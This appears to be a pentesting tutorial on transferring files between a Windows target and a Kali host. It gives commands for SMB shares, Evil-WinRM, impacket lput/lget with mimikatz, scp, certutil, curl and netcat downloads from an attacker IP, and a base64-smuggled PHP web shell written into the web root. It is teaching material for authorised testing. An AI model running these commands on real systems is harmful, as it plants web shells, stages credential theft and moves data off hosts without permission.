Whether you are solving a machine/lab, or engaging in a penetration testing assessment there will be times where you are required to transfer a file, it can be from your host to the target's host (windows/linux) or vice versa. Here I share a few tricks on how you can transfer files from Windows Machine to your Kali host.
With impacket we can use the utility impacket-smbserver
to start an SMB server and use it to transfer files from windows.
impacket-smbserver test . -smb2support -username jojomojo -password jojomojo
net use m: \\YOUR_KALI_IP\test /user:jojomojo jojomojo
copy backup.zip m:\
Replace
YOUR_KALI_IP
with your Kali Linux host's IP.
Evil-WinRM has built-in commands known as upload
and download
which can be used to upload and download files respectively.
upload /path/to/sourcefile C:\path\to\destinationfile
upload /home/kali/Desktop/chisel.exe C:\Users\testuser\chisel.exe
download C:\path\to\sourcefile /path/to/destinationfile
download C:\Users\testuser\Desktop\backup.zip /home/kali/Desktop/backup.zip
Some of the impacket utilities such as impacket-psexec
, impacket-wmiexec
, impacket-smbexec
have built-in commands such as lput
and lget
that can be used to upload and download a file.
A file that is uploaded with this command, will be uploaded to the *C:\Windows* directory.
C:\Windows\system32> lput mimikatz.exe
[*] Uploading mimikatz.exe to ADMIN$\/
C:\Windows\system32> cd C:\windows
C:\Windows> dir /b mimikatz.exe
mimikatz.exe
C:\Windows> lget mimikatz.log
[*] Downloading ADMIN$\mimikatz.log
If the windows machine has a RDP port open, we can mount shared folders and copy files.
rdesktop -z -P -x m -u jojomojo -p lab 192.168.1.120 -r disk:test=/path/to/your/shared/dir
copy mimikatz.log \\tsclient\test\mimikatz.log
SCP can be useful especially when transferring large files.
scp /home/kali/Desktop/bad.exe Administrator@192.168.1.102:'C:\Users\Administrator\Documents\good.exe'
scp Administrator@192.168.1.102:'C:\Users\Administrator\Documents\important_file.zip' /home/kali/Documents/
Base64 encoding/decoding can be used as a way to transfer files from/to windows.
Contents of webshell.php
└─$ cat webshell.php
<?php echo shell_exec($_GET['cmd']); ?>
Encoding the content of webshell.php, you can use either one of these commands to encode the webshell to base64, then copy the output.
└─$ base64 -w0 <<< cat webshell.php
└─$ cat webshell.php | base64 -w0
# output
PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg==
PS C:\Users\jojomojo\Documents> [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg==')) > C:\inetpub\wwwroot\shell.php
C:\Users\jojomojo\Documents> echo PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg== > enc
C:\Users\jojomojo\Documents> certutil -decode .\enc C:\inetpub\wwwroot\shell.php
Run any of the commands below to start a HTTP webserver
python3 -m http.server 80
python2 -m SimpleHTTPServer 80
certutil.exe -urlcache -f http://192.168.1.120/test.exe bad.exe
curl -s -O http://192.168.1.102/test.exe
wget -o bad.exe http://192.168.1.102/test.exe
Invoke-WebRequest -Uri "https://192.168.1.102/test.exe" -OutFile "C:\Downloads\bad.exe"
iwr http://192.168.1.102/test.exe -OutFile "C:\Downloads\bad.exe"
nc 10.1.1.17 443 < /home/kali/Desktop/bad.exe
C:\Users\jojomojo\Test> nc.exe -l -p 443 > C:\Users\jojomojo\Documents\serviceRun.exe
Although there are more methods/techniques used to transfer files, the few mentioned above are most used methods in common pentesting scenarios allowing you to easily transfer files from windows to your kali linux host.